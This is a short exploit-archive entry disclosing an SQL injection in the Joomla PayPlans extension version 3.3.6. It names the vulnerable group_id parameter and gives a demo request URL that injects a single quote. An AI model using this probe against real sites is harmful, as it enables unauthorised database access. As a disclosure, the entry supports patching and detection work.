id: 25088
date: 06/13/2016
title: Joomla! Extension PayPlans (com_payplans) 3.3.6 - SQL Injection
author: Mojtaba MobhaM
cves: 

######################
# Exploit Title : Joomla com_payplans - SQL Injection
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/payplans
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.3.6
# Date: 2016/06/08
######################
#
# PoC:
 
# group_id Parameter Vulnerable To SQL
 
# Demo :
 
# http://server/index.php?option=com_payplans&group_id=4%27
 
# Youtube : https://www.youtube.com/watch?v=Y5mpM0IBlUk
 
######################
# Discovered by : Mojtaba MobhaM

#  0day.today [2023-03-22]  #